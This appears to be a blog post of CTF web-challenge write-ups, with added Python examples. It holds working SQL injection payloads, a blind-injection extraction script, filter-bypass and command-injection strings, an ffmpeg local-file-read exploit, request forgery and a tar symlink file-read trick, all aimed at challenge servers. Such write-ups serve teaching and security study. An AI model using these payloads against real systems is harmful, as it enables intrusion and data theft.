Sky's blog

Write-ups for some of the geekgame web challenges

Word count: 1,667 / Reading time: 9 min
2017/10/28

故道白云

A simple UNION injection; the only trap is that the flag lives in another database, so the subquery has to reference the table cross-database (f1ag.flag). If the schema name is not guessable, it can be read from information_schema.schemata first.

http://game.sycsec.com:2006/?submit=submit&id=-1' union select 1,(select f4ag from f1ag.flag) -- 1

Flag: SYC{HACKEr_By-cL0und}

粗心的李超

index.php.bak is exposed, and it contains:

<?php
include "flag.php";
// Login: a hard-coded username/password pair sets the cookie.
if(isset($_POST['user'])&&isset($_POST['pass'])){
    if($_POST['user']=='admin'&&$_POST['pass']=='lc19971117'){
        setcookie("user","admin");
    }
}
// Authorization relies only on the client-supplied cookie value.
if(isset($_COOKIE['user'])){
    if($_COOKIE['user']=="admin"){
        echo $flag;
    }else{
        echo "who are u ?";
    }
}else{
    setcookie("user","guest");
}
?>

Logging in as admin / lc19971117 sets the cookie and the page prints the flag. Note that only the cookie is ever checked, so sending Cookie: user=admin directly works without the password at all. Flag: SYC{just_brute_is_ok!}

Buy me a Tesla

Click "purchase" and capture the request:

submit=%E8%AE%A2%E8%B4%AD&value=1602500&yue=10&sign=WkVkV2VtSkhSazVpTWxKc1lrWm9OMlJ0Um5Oa1YxVTJUVlJaZDAxcVZYZE5RM2czWkZoT2JHTnVUVzVqZVVJMVpGZFZOazFVUWprPQ%3D%3D

Base64-decoding sign repeatedly (three layers) gives:
teslaModelX{value:1602500,{users's yue:10}
The "signature" is just the order parameters wrapped in base64 with no secret, so it can be rewritten by the client. Setting the balance (yue) to 100000000000 and re-encoding gives the payload:

submit=%E8%AE%A2%E8%B4%AD&value=1602500&yue=100000000000&sign=%57%6b%56%6b%56%32%56%74%53%6b%68%53%61%7a%56%70%54%57%78%4b%63%31%6c%72%57%6d%39%4f%4d%6c%4a%30%55%6d%35%4f%61%31%59%78%56%54%4a%55%56%6c%4a%61%5a%44%41%78%63%56%5a%59%5a%45%35%52%4d%32%63%7a%57%6b%5a%6f%54%32%4a%48%54%6e%56%55%56%7a%56%71%5a%56%56%4a%4d%56%70%47%5a%46%5a%4f%61%7a%46%56%55%56%68%6b%54%6c%4a%46%52%6a%4e%55%56%56%4a%43%5a%44%41%78%52%56%46%59%5a%47%31%56%56%44%41%35

which returns the flag: <script>alert("Purchase successful! Your order SYC{KeYiGeiWoMaiYiGeZhenDeTeslaMa?}")</script>
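The decode-edit-re-encode step above, as an added example that is not part of the original write-up: it peels base64 layers until the data stops being base64, rewrites one field, and re-wraps it with the same depth. The only page data it uses is the captured sign value; the field pattern (name:digits) is an assumption about the blob's layout.

```python
# Added example (not from the original write-up): the order "sign" is just the
# request parameters wrapped in several layers of base64 with no secret, so a
# client can decode it, edit the balance and re-encode it. The number of layers
# is discovered by peeling until the data is no longer valid base64.
import base64
import binascii
import re

B64_RE = re.compile(r'^[A-Za-z0-9+/]*={0,2}$')

# The sign value captured from the purchase request on the page.
PAGE_SIGN = ("WkVkV2VtSkhSazVpTWxKc1lrWm9OMlJ0Um5Oa1YxVTJUVlJaZDAxcVZYZE5RM2cz"
             "WkZoT2JHTnVUVzVqZVVJMVpGZFZOazFVUWprPQ==")


def peel_base64(data: str, max_depth: int = 16):
    """Decode nested base64 until the result is no longer base64.
    Returns (plaintext, number_of_layers_removed)."""
    depth = 0
    while depth < max_depth:
        if not data or len(data) % 4 != 0 or not B64_RE.match(data):
            break
        try:
            decoded = base64.b64decode(data, validate=True).decode('ascii')
        except (binascii.Error, UnicodeDecodeError):
            break
        data, depth = decoded, depth + 1
    return data, depth


def wrap_base64(data: str, depth: int) -> str:
    """Apply base64 'depth' times (the inverse of peel_base64)."""
    for _ in range(depth):
        data = base64.b64encode(data.encode('ascii')).decode('ascii')
    return data


def forge_sign(sign: str, field: str, new_value: str) -> str:
    """Rewrite one 'field:digits' pair inside the signed blob and re-wrap it
    with the same number of base64 layers. Assumes that layout (as on the page)."""
    plain, depth = peel_base64(sign)
    pattern = re.compile(re.escape(field) + r':\d+')
    if not pattern.search(plain):
        raise ValueError(f'{field!r} not found in {plain!r}')
    return wrap_base64(pattern.sub(f'{field}:{new_value}', plain, count=1), depth)
```

The length check (a multiple of 4) and the alphabet check are what stop the loop: the decoded order text contains braces and colons, so it can never be mistaken for a fourth layer.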

PHP的悖论1

Challenge description:

if ($_POST['s1'] !== $_POST['s2'] && md5($_POST['s1']) === md5($_POST['s2'])) { echo $flag; }

The classic md5() bypass: md5() expects a string, and on PHP 5/7 passing an array makes it emit a warning and return NULL, so both sides become NULL and even the strict comparison passes while the two arrays themselves differ.
POST: s1[]=1&s2[]=2
(On PHP 8 md5() throws a TypeError for an array instead, which closes this trick.)
Flag: SYC{Th3_b33t_l4n_1nth3w0rld!!!}

PHP的悖论2

Challenge description:

if ($_POST['s1'] !== $_POST['s2'] && md5($_POST['s1']) == md5($_POST['s2'])) { echo $flag; }

PHP's loose comparison (==) compares two numeric strings as numbers, and a digest of the form 0e<digits> is scientific notation for zero, so any two md5 digests that both start with 0e followed only by digits compare equal. Just find two such strings:
POST: s1=QNKCDZO&s2=s878926199a
Flag: SYC{Y0u_g0th3w4y_to_k111==}
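A check for the property the two strings rely on, as an added example that is not from the write-up: it emulates PHP's numeric-string comparison for md5 hex digests and includes a small brute-force finder. The PHP rule itself (numeric strings compare numerically under ==, still true in PHP 8) is standard; the finder's prefix and budget are arbitrary.

```python
# Added example (not from the write-up): why QNKCDZO and s878926199a pass PHP's
# loose comparison. A hex digest that is all digits, or digits + 'e' + digits,
# is a PHP numeric string; '0e...' parses as 0 * 10^n == 0, so two such
# digests are == even though they are different strings.
import hashlib
import re

MAGIC_RE = re.compile(r'^0e\d+$')          # "magic hash": 0e followed by digits only
NUMERIC_RE = re.compile(r'^\d+(e\d+)?$')   # the subset of hex digests PHP treats as numeric


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_md5(s: str) -> bool:
    """True if md5(s) is '0e' followed only by decimal digits."""
    return MAGIC_RE.match(md5_hex(s)) is not None


def php_loose_equal_md5(a: str, b: str) -> bool:
    """Emulate PHP's == on md5(a) and md5(b): numeric strings compare as
    numbers, anything else byte-for-byte."""
    ha, hb = md5_hex(a), md5_hex(b)
    if NUMERIC_RE.match(ha) and NUMERIC_RE.match(hb):
        return float(ha) == float(hb)     # both 0e... digests are 0.0
    return ha == hb


def find_magic(prefix: str, budget: int):
    """Try prefix+counter up to 'budget' times; return the first magic-hash
    string or None. Hits are rare (roughly one in a few hundred million),
    so a real search needs a much larger budget than a demo run."""
    for i in range(budget):
        cand = f'{prefix}{i}'
        if is_magic_md5(cand):
            return cand
    return None
```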

视频播放器

Look at the hint in the page source:

<!-- Powered by ffmpeg. ffmpeg shi sha?? baidu yi xia, ni jiu zhi dao.-->

Search for ffmpeg and the known AVI/playlist trick comes up. Download the generator script at https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py, which builds an AVI whose embedded playlist makes ffmpeg read a local file and render its contents as frames of the output video.
Run it: python3 gen_xbin_avi.py file:///var/www/html/index.php sky.avi
Upload sky.avi, and the flag is visible in the rendered video: SYC{WhatIsExpFuckNoLiaoDe???}

iPhone X

Changing the User-Agent is enough at first; a later hint says an X-Forwarded-For header has to be added as well (both are client-controlled, which is the whole point):

X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS X_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25 Chrome/59.0.3071.86 Safari/537.36

The response then contains the flag:

<h1>Only iPhone X could access this website.</h1>
<hr>
<br>
OK, you have buy the iphone X using the time machine<br>SYC{UA_AND_IP_COULD_BE_FORGED_!!!}

Clound的错误

Look at the page source first; the HTML comment gives it away (translated):

Actually I'm an introvert. I hide everything I want to say. But today I'm going to say it out loud.
Actually... actually...
Actually I'm a SQL injection.
I'm going to show you all of my "errors".
-->
<!-- sycid=1 -->
<!-- hacked by cLound -->

Still a simple injection, cross-database again, this time error-based: updatexml() raises an XPath syntax error whose message echoes the injected string (at most 32 characters of it, which is enough for this flag; longer data would need substr()).

http://game.sycsec.com:2007/?sycid=1' and 1=updatexml(1,concat(0x7e,(select f4ag from f1ag.flag),0x7e),1) -- 1

Flag: SYC{Err0r_sql_inj}

G胖万岁

http://game.sycsec.com:2008/Steam/1.php?type=DESC
From the URL, the SQL is probably something like:
select * from <table> order by <column> $type;
So the injection point is the sort direction, and what we can influence is the sort order. Tested locally:

mysql> select * from users order by id DESC;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 4 | zjgcjy | 777 |
| 3 | jarbeen | 666 |
| 2 | sky | skyiscool |
| 1 | admin | skyiscool |
+----+----------+-----------+

mysql> select * from users order by id;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 1 | admin | skyiscool |
| 2 | sky | skyiscool |
| 3 | jarbeen | 666 |
| 4 | zjgcjy | 777 |
+----+----------+-----------+

mysql> select * from users order by id ^1;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 1 | admin | skyiscool |
| 3 | jarbeen | 666 |
| 2 | sky | skyiscool |
| 4 | zjgcjy | 777 |
+----+----------+-----------+

mysql> select * from users order by id ^0;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 1 | admin | skyiscool |
| 2 | sky | skyiscool |
| 3 | jarbeen | 666 |
| 4 | zjgcjy | 777 |
+----+----------+-----------+

So ^ (XOR) changes the ordering: ORDER BY id ^ 1 sorts on id XOR 1, which swaps each even/odd neighbour pair, while ^ 0 leaves the normal order. Since a true condition evaluates to 1 and a false one to 0 in MySQL, ORDER BY id ^ (condition) LIMIT 1 returns a different first row depending on the condition, which is a boolean-blind oracle.
Trying it on the challenge:

http://game.sycsec.com:2008/Steam/1.php?type=^1 limit 1
Only the game Witcher III appears.

http://game.sycsec.com:2008/Steam/1.php?type=^0 limit 1
Only the game Portal2 appears.

We can build a blind injection on that. Injection script:

#!/usr/bin/env python3
# Author:Sublime
# coding:utf-8
import requests

res = ''
for x in range(1, 30):
    for y in range(33, 127):
        # true condition -> ^1 -> Witcher III first; false -> ^0 -> Portal2 first
        url = ('http://game.sycsec.com:2008/Steam/1.php?type=^((ascii(substr((select f14g_is '
               'from g4m3e1.F1ag_1s_h3re limit 0,1),' + str(x) + ',1)))=' + str(y) + ') limit 1')
        f = requests.get(url=url)
        if 'Witcher' in f.text:
            res += chr(y)
            print(res)
            break
    else:
        # no character matched at this position: end of the string
        break

Run it and the flag comes out: SYC{ShutupandBuy1t}
Note the cross-database reference again; apparently every injection in this contest needs one.
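The same ORDER BY ^ (condition) oracle driven by a binary search rather than a linear scan over every character code (7 requests per character instead of up to 94), as an added example that is not the write-up's script. To run offline it simulates the query on a constructed in-memory table; the rows, the stand-in secret column and the ids (chosen so the XOR flip changes the first row as the page observed) are assumptions. Against the real target, build_type_param() is what goes in the type parameter and the oracle would be a requests.get() like the script above.

```python
# Added example (not the write-up's own script): boolean-blind extraction through
# 'ORDER BY <col> ^ (cond) LIMIT 1', with a binary search on the character code
# and a simulated database so it runs offline. GAMES, SECRET and the column name
# are constructed assumptions; the subquery text is the one from the page.

# Constructed rows: ids chosen so that ORDER BY id ^ 1 puts Witcher III first
# and ORDER BY id ^ 0 puts Portal2 first, matching what the page observed.
GAMES = [(2, 'Portal2'), (3, 'Witcher III'), (4, 'Half-Life 3')]
SECRET = 'SYC{ShutupandBuy1t}'   # stands in for f14g_is; the flag from the page


def build_type_param(pos: int, threshold: int) -> str:
    """The injected ORDER BY suffix: ascii(substr(secret,pos,1)) > threshold
    evaluates to 1 or 0, which XORs the sort key."""
    return ('^((ascii(substr((select f14g_is from g4m3e1.F1ag_1s_h3re limit 0,1),'
            f'{pos},1)))>{threshold}) limit 1')


def mysql_ascii_substr(s: str, pos: int) -> int:
    """MySQL semantics: substr past the end is '' and ascii('') is 0."""
    return ord(s[pos - 1]) if 1 <= pos <= len(s) else 0


class Oracle:
    """Simulates 'SELECT ... ORDER BY id ^ (cond) LIMIT 1' over GAMES."""

    def __init__(self, rows, secret):
        self.rows, self.secret, self.queries = rows, secret, 0

    def first_row_is_witcher(self, pos: int, threshold: int) -> bool:
        # In the real attack this is one HTTP request with build_type_param().
        self.queries += 1
        cond = 1 if mysql_ascii_substr(self.secret, pos) > threshold else 0
        first = min(self.rows, key=lambda r: r[0] ^ cond)
        return first[1] == 'Witcher III'


def extract(oracle: Oracle, max_len: int = 64) -> str:
    """Recover the secret one character at a time by binary search."""
    out = ''
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:                 # invariant: lo <= ascii <= hi
            mid = (lo + hi) // 2
            if oracle.first_row_is_witcher(pos, mid):
                lo = mid + 1           # ascii > mid
            else:
                hi = mid               # ascii <= mid
        if lo == 0:                    # ascii('') == 0: past the end of the string
            break
        out += chr(lo)
    return out


if __name__ == '__main__':
    o = Oracle(GAMES, SECRET)
    print(extract(o), 'in', o.queries, 'queries')
```

The end-of-string test matters: MySQL returns '' for substr() past the end and ascii('') is 0, so a character code of 0 is the stop condition rather than a missing match.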

Clound的错误2

This one just adds a filter.
Spaces are replaced with %0a (a newline, which MySQL accepts as whitespace).
or, and, select, from and the like are stripped once, so writing each keyword with a full copy nested inside it (and -> aandnd, select -> selselectect, from -> frfromom) leaves the real keyword behind after the filter has run.
Payload:

http://game.sycsec.com:2010/?sycid=1'%0aaandnd%0a1=updatexml(1,concat(0x7e,(selselectect%0af4ag%0afrfromom%0af1ag.flag),0x7e),1)%0aaandnd%0a'a'='a

Flag: SYC{Err0R_sQl_inj2}
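The double-writing transform and the reason it works, as an added example that is not from the write-up. The server's filter is a reconstruction of the behaviour the page describes (each blacklisted keyword deleted once, spaces rejected), not the challenge's actual code, and the blacklist is assumed from the keywords the page had to double.

```python
# Added example (not from the write-up): why double-writing defeats a
# single-pass keyword filter. Both the blacklist and server_filter() are
# assumptions reconstructing the behaviour described on the page.
import urllib.parse

BLACKLIST = ['select', 'from', 'and', 'or']   # assumed; longest keywords first


def server_filter(s: str) -> str:
    """Assumed filter: each keyword deleted once (str_replace style), spaces dropped."""
    for kw in BLACKLIST:
        s = s.replace(kw, '')
    return s.replace(' ', '')


def double_write(s: str) -> str:
    """Split each keyword in half and nest a full copy inside it, so that
    deleting the inner copy once reassembles the outer one: and -> aandnd.
    Spaces become newlines, which the filter passes and MySQL treats as whitespace."""
    for kw in BLACKLIST:
        half = len(kw) // 2
        s = s.replace(kw, kw[:half] + kw + kw[half:])
    return s.replace(' ', '\n')


# The query the page ultimately wants MySQL to see (spaces shown for readability).
CLEAN = ("1' and 1=updatexml(1,concat(0x7e,(select f4ag from f1ag.flag),0x7e),1) "
         "and 'a'='a")
WANTED = CLEAN.replace(' ', '\n')   # what must survive the filter


def build_url(base: str, param: str, value: str) -> str:
    """URL-encode the payload; the newlines become %0A as on the page."""
    return f'{base}?{param}=' + urllib.parse.quote(value, safe="()=,'.")


if __name__ == '__main__':
    payload = double_write(CLEAN)
    print(build_url('http://game.sycsec.com:2010/', 'sycid', payload))
    print('after filter:', repr(server_filter(payload)))
```

Keyword order matters in both directions: if a short keyword (or) were doubled after a longer one containing it, the nested copy could be broken up again, so the transform and the check process the list longest-first.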

大大的标题

A 1.zip source leak is found; auditing it:

<?php
if( isset( $_POST[ 'submit' ] ) ) {
    $target_path = "./upload/";
    $target_path .= basename( $_FILES[ 'file' ][ 'name' ] );
    $file_name = $_FILES[ 'file' ][ 'name' ];
    // extension = everything after the last dot
    $file_ext = substr( $file_name, strrpos( $file_name, '.' ) + 1);
    $file_type = $_FILES[ 'file' ][ 'type' ];   // client-supplied MIME type
    $file_size = $_FILES[ 'file' ][ 'size' ];
    $allow_ext=array("jpg","jpeg","png");
    $succe_ext=array("php","php3","php4","php5","phtml","pht");
    $flag="flag";

    // Only the MIME type and the size are checked before the extension branches.
    if( ( $file_type == "image/jpeg" || $file_type == "image/png" ) &&
        ( $file_size < 100000 ) ) {

        if(in_array($file_ext, $allow_ext)){
            if( !move_uploaded_file( $_FILES[ 'file']['tmp_name' ], $target_path ) ) {
                echo "<center><h2>upload file error!!</h2></center>";
            }
            else {
                echo "<center><h2>{$target_path} succesfully uploaded!</h2></center>";
            }
        }
        // A PHP extension is never saved, but it is what prints the flag.
        if(in_array($file_ext,$succe_ext)){
            echo "<center><h3>".$flag."</h3></center>";
            system("rm -f ".$_FILES['file']['tmp_name']);
        }
    }
    else {
        echo "only accept JPG JPEG or PNG images and size < 100000";
    }
}
?>

The image check only looks at the client-supplied MIME type, so set Content-Type: image/jpeg on the file part of the multipart body and upload a file with any of the extensions php, php3, php4, php5, phtml or pht; the flag is printed (the temp file is deleted afterwards, so nothing ever needs to land in ./upload/).
Flag: SYC{CLound-upL0ad}

你的名字

This one was misleading: it looked like SQL injection at first, but it turned out to be command injection. A newline (%0a) ends the original command line and starts ours:

http://game.sycsec.com:2012/?name=%0apwd
Response:
Your name is: /var/www/html

Then most commands turned out to be filtered, which meant learning some bash tricks for getting past keyword filters. A backslash breaks up the keyword: the filter sees l\s, but the shell strips the unquoted backslash and runs ls:

http://game.sycsec.com:2012/?name=%0al\s
Response:
Your name is: index.php

Then a long, painful search with no flag in sight; the guess was that it was hidden in a dotfile. A tab (%09) stands in for the space:

http://game.sycsec.com:2012/?name=%0afin\d%09
Response:
Your name is: . ./.YoufindMeButYouCanN0tReadMe.swp ./index.php

Then cat it to get the flag (the filename itself contains "find", so that gets a backslash too):

http://game.sycsec.com:2012/?name=%0aca\t%09.Youfin\dMeButYouCanN0tReadMe.swp
Response:
Your name is:
b0VIM 7.4�jrootiZwz9aqtiwio4jjeu737peZ/var/www/html/YoufindMeButYouCanN0tReadMe U3210#"! Utpad���SYC{Wo_ai_he_kou_jue_jiu}

The file is a Vim swap file (the b0VIM header), and the flag sits in the buffer contents.
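Why l\s and %09 get past the filter, shown with Python's shlex (which applies the same unquoting rules as a POSIX shell: an unquoted backslash is removed and the next character kept literally, and a tab separates words). This is an added example, not the write-up's code; the blacklist is assumed from the commands the page had to disguise, and the filter is assumed to be a plain substring check on the raw parameter.

```python
# Added example (not the write-up's code): the filter checks the raw parameter
# for substrings, while the shell removes unquoted backslashes before executing,
# so "l\s" is not "ls" to the filter but is "ls" to bash. Tabs replace spaces.
# BLACKLIST is an assumption reconstructed from the page's payloads.
import shlex
import urllib.parse

BLACKLIST = ['ls', 'cat', 'find', 'flag', ' ']


def filter_rejects(raw: str) -> bool:
    """Assumed server-side check: any blacklisted substring in the raw input."""
    return any(word in raw for word in BLACKLIST)


def shell_words(raw: str) -> list:
    """The words a POSIX shell would actually execute for this line."""
    return shlex.split(raw)


def smuggle(cmd: str) -> str:
    """Put a backslash before the last letter of every blacklisted word and use
    tabs instead of spaces, reproducing the page's ca\\t%09.Youfin\\dMe... form."""
    out = []
    for word in cmd.split(' '):
        for bad in BLACKLIST:
            if bad != ' ' and bad in word:
                i = word.index(bad) + len(bad) - 1
                word = word[:i] + '\\' + word[i:]
        out.append(word)
    return '\t'.join(out)


def to_param(raw: str) -> str:
    """URL-encode for ?name=%0a<cmd>; the leading newline ends the original command."""
    return '%0a' + urllib.parse.quote(raw, safe='')


if __name__ == '__main__':
    for cmd in ['ls', 'find .', 'cat .YoufindMeButYouCanN0tReadMe.swp']:
        s = smuggle(cmd)
        print(repr(s), 'rejected:', filter_rejects(s), 'shell runs:', shell_words(s))
        print(to_param(s))
```

The same mismatch explains the other classic bypasses (quotes inside a word such as l''s, or $IFS for the space): the filter operates on bytes, the shell on the words left after its own quote removal and field splitting.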

快捷方式的妙用

The challenge title makes it obvious this is about tar. The server extracts the uploaded tar and then cats the extracted file, so the plan is clear: put a symlink in the archive and let the server read whatever it points to.

ln -s /var/www/html/upload.php sky.txt
tar -cf sky.tar sky.txt

This maps the server's upload.php onto sky.txt (tar stores the symlink itself, not its target); pack it, upload it, and the source comes back. That reveals the path of the flag.

ln -s /home/flag_is_here_hahaha sky.txt
tar -cf sky.tar sky.txt

Upload it once more to get the flag: SYC{Bust_1inK!!!}
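Building the symlink-carrying archive without touching the local filesystem, plus the check an extractor should make before trusting such a member, as an added example that is not from the write-up. The link names and targets are the ones on the page; the extraction directory is an assumption, and the targets are never read here, only the archive members are inspected.

```python
# Added example (not from the write-up): a tar with a symlink entry created
# purely in memory, and the validation a server should apply to archive
# members before extracting or reading them. DEST is an assumed upload dir.
import io
import os
import tarfile

DEST = '/var/www/html/uploads'   # assumed extraction directory


def make_symlink_tar(link_name: str, target: str) -> bytes:
    """Return a tar archive whose only member is the symlink link_name -> target."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w') as tar:
        info = tarfile.TarInfo(name=link_name)
        info.type = tarfile.SYMTYPE
        info.linkname = target
        tar.addfile(info)          # no real file needed for a symlink entry
    return buf.getvalue()


def list_members(archive: bytes):
    """(name, linkname, is_symlink) for every member."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode='r') as tar:
        return [(m.name, m.linkname, m.issym()) for m in tar.getmembers()]


def unsafe_members(archive: bytes, dest: str = DEST):
    """Members that would let extraction (or a later cat) reach outside dest:
    names that escape dest, and links whose target resolves outside it."""
    bad = []
    dest = os.path.realpath(dest)
    with tarfile.open(fileobj=io.BytesIO(archive), mode='r') as tar:
        for m in tar.getmembers():
            member_path = os.path.realpath(os.path.join(dest, m.name))
            if os.path.commonpath([dest, member_path]) != dest:
                bad.append(m.name)            # ../ or absolute member name
                continue
            if m.issym() or m.islnk():
                link = m.linkname
                resolved = link if os.path.isabs(link) else os.path.join(os.path.dirname(member_path), link)
                if os.path.commonpath([dest, os.path.realpath(resolved)]) != dest:
                    bad.append(m.name)        # link escapes the extraction dir
    return bad


if __name__ == '__main__':
    archive = make_symlink_tar('sky.txt', '/home/flag_is_here_hahaha')
    print(list_members(archive))
    print('unsafe:', unsafe_members(archive))
```

Python 3.12 added extraction filters (extractall(..., filter='data')) that reject exactly these members; on older versions, or when the server reads files by name after extraction as this challenge does, a check like unsafe_members() has to be explicit.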
